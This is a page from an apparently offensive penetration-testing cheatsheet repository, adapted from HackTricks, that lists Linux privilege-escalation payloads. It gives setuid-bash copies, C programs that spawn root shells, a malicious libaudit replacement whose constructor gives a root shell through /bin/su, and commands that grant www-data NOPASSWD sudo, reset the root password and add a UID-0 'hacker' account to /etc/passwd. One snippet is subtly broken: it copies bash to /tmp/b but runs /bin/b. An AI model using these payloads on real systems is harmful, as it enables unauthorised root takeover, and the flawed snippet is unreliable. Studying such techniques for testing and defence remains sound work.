daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

payloads-to-execute.md (8342B)


      1 ---
      2 title: "Payloads to execute"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Payloads to execute
     14 
     15 ## Bash
     16 
     17 `bash -p` enables privileged mode: when Bash starts with different real and effective IDs, it does not reset the effective ID to the real ID. The resulting shell still depends on the caller's existing credentials.<sup>[[1]](#references)[[3]](#references)</sup>
     18 
     19 ```bash
     20 cp /bin/bash /tmp/b && chmod +s /tmp/b
     21 /bin/b -p #Maintains root privileges from suid, working in debian & buntu
     22 ```
     23 
     24 ## C
     25 
     26 `setresuid` changes the real, effective, and saved IDs when permitted, while `setuid` changes the effective ID and may also set the real and saved IDs for a privileged caller. `execve` replaces the current process image with the requested program.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup> These examples omit return-value checks; both credential calls can fail even for UID 0.<sup>[[2]](#references)[[3]](#references)</sup>
     27 
     28 ```c
     29 //gcc payload.c -o payload
     30 int main(void){
     31     setresuid(0, 0, 0); //Set as user suid user
     32     system("/bin/sh");
     33     return 0;
     34 }
     35 ```
     36 
     37 ```c
     38 //gcc payload.c -o payload
     39 #include <stdio.h>
     40 #include <unistd.h>
     41 #include <sys/types.h>
     42 
     43 int main(){
     44     setuid(getuid());
     45     system("/bin/bash");
     46     return 0;
     47 }
     48 ```
     49 
     50 ```c
     51 // Privesc to user id: 1000
     52 #define _GNU_SOURCE
     53 #include <stdlib.h>
     54 #include <unistd.h>
     55 
     56 int main(void) {
     57     char *const paramList[10] = {"/bin/bash", "-p", NULL};
     58     const int id = 1000;
     59     setresuid(id, id, id);
     60     execve(paramList[0], paramList, NULL);
     61     return 0;
     62 }
     63 ```
     64 
     65 ## Overwriting a file to escalate privileges
     66 
     67 ### Common files
     68 
     69 These are common local privilege-control files and interfaces: `/etc/passwd` stores seven-field account records, `/etc/shadow` stores optional encrypted password data, `sudoers` defines sudo privileges and tags such as `NOPASSWD`, and Docker's default daemon endpoint is a Unix socket at `/var/run/docker.sock`; access to that socket can grant root-level control of its host.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
     70 
     71 - Add user with password to _/etc/passwd_
     72 - Change password inside _/etc/shadow_
     73 - Add user to sudoers in _/etc/sudoers_
     74 - Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_
     75 
     76 ### Overwriting a library
     77 
     78 Check which shared libraries a binary uses; in this example, inspect `/bin/su` with `ldd`.<sup>[[9]](#references)</sup>
     79 
     80 ```bash
     81 ldd /bin/su
     82         linux-vdso.so.1 (0x00007ffef06e9000)
     83         libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
     84         libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
     85         libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
     86         libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
     87         libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
     88         libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
     89         /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
     90 ```
     91 
     92 `ldd` reports shared-object dependencies, while the dynamic linker uses ELF metadata and its search rules to load them at runtime.<sup>[[9]](#references)[[10]](#references)</sup>
     93 
     94 To inspect one candidate, use `objdump -T` to print the dynamic symbol table of `su` and filter for audit names.<sup>[[11]](#references)</sup>
     95 
     96 ```bash
     97 objdump -T /bin/su | grep audit
     98 0000000000000000      DF *UND*  0000000000000000              audit_open
     99 0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
    100 0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
    101 000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd
    102 ```
    103 
    104 `audit_open`, `audit_log_user_message`, and `audit_log_acct_message` are libaudit functions; `audit_fd` is shown as a data object defined in `su`'s `.bss` in this output.<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup> A replacement library must export compatible definitions for the undefined symbols that the loader resolves; mismatched function/data ABIs can still make the process fail when those symbols are relocated or called.<sup>[[10]](#references)[[11]](#references)</sup>
    105 
    106 GCC's `constructor` attribute causes `inject` to be called automatically before `main` on supported targets.<sup>[[15]](#references)</sup>
    107 
    108 ```c
    109 #include<stdio.h>
    110 #include<stdlib.h>
    111 #include<unistd.h>
    112 
    113 //gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
    114 
    115 int audit_open;
    116 int audit_log_acct_message;
    117 int audit_log_user_message;
    118 int audit_fd;
    119 
    120 void inject()__attribute__((constructor));
    121 
    122 void inject()
    123 {
    124     setuid(0);
    125     setgid(0);
    126     system("/bin/bash");
    127 }
    128 ```
    129 
    130 If the replacement is loaded successfully by a privileged **`/bin/su`** process, this constructor can start **`/bin/bash`** with that process's privileges; the exact result is environment-dependent.<sup>[[10]](#references)[[15]](#references)</sup>
    131 
    132 ## Scripts
    133 
    134 Can you make root execute something?
    135 
    136 `sudoers` uses the `NOPASSWD` tag in policy entries, `chpasswd` reads `user:password` pairs from standard input, and `/etc/passwd` uses seven colon-separated account fields; the following examples assume the relevant files are writable by the process that runs them.<sup>[[5]](#references)[[6]](#references)[[16]](#references)</sup>
    137 
    138 ### **www-data to sudoers**
    139 
    140 ```bash
    141 echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
    142 ```
    143 
    144 ### **Change root password**
    145 
    146 ```bash
    147 echo "root:hacked" | chpasswd
    148 ```
    149 
    150 ### Add new root user to /etc/passwd
    151 
    152 The final payload depends on a target that accepts the generated `crypt` hash: Debian's `mkpasswd -m sha-512` maps to SHA-512 crypt (`$6$`), while OpenSSL's `passwd -1 -salt` uses the MD5-based BSD algorithm (`$1$`).<sup>[[17]](#references)[[18]](#references)</sup>
    153 
    154 ```bash
    155 echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
    156 ```
    157 
    158 ## References
    159 
    160 - [1] [The Set Builtin (Bash Reference Manual)](https://www.gnu.org/s/bash/manual/html_node/The-Set-Builtin.html)
    161 - [2] [setresuid(2) — Linux manual page](https://man7.org/linux/man-pages/man2/setresuid.2.html)
    162 - [3] [setuid(2) — Linux manual page](https://man7.org/linux/man-pages/man2/setuid.2.html)
    163 - [4] [execve(2) — Linux manual page](https://man7.org/linux/man-pages/man2/execve.2.html)
    164 - [5] [passwd(5) — Linux manual page](https://man7.org/linux/man-pages/man5/passwd.5.html)
    165 - [6] [sudoers(5) — Debian Manpages](https://manpages.debian.org/testing/sudo/sudoers.5.en.html)
    166 - [7] [Protect the Docker daemon socket](https://docs.docker.com/engine/security/protect-access/)
    167 - [8] [dockerd — Docker Docs](https://docs.docker.com/reference/cli/dockerd/)
    168 - [9] [ldd(1) — Linux manual page](https://man7.org/linux/man-pages/man1/ldd.1.html)
    169 - [10] [ld.so(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ld.so.8.html)
    170 - [11] [objdump (GNU Binary Utilities)](https://sourceware.org/binutils/docs/binutils/objdump.html)
    171 - [12] [audit_open(3) — Debian Manpages](https://manpages.debian.org/trixie/libaudit-dev/audit_open.3.en.html)
    172 - [13] [audit_log_user_message(3) — Debian Manpages](https://manpages.debian.org/testing/libaudit-dev/audit_log_user_message.3.en.html)
    173 - [14] [audit_log_acct_message(3) — Debian Manpages](https://manpages.debian.org/testing/libaudit-dev/audit_log_acct_message.3.en.html)
    174 - [15] [Common Attributes (Using the GNU Compiler Collection)](https://gcc.gnu.org/onlinedocs/gcc/Common-Attributes.html)
    175 - [16] [chpasswd(8) — Linux manual page](https://man7.org/linux/man-pages/man8/chpasswd.8.html)
    176 - [17] [mkpasswd.c — Debian Sources](https://sources.debian.org/src/whois/5.5.17/mkpasswd.c)
    177 - [18] [openssl-passwd — OpenSSL Documentation](https://docs.openssl.org/master/man1/openssl-passwd/)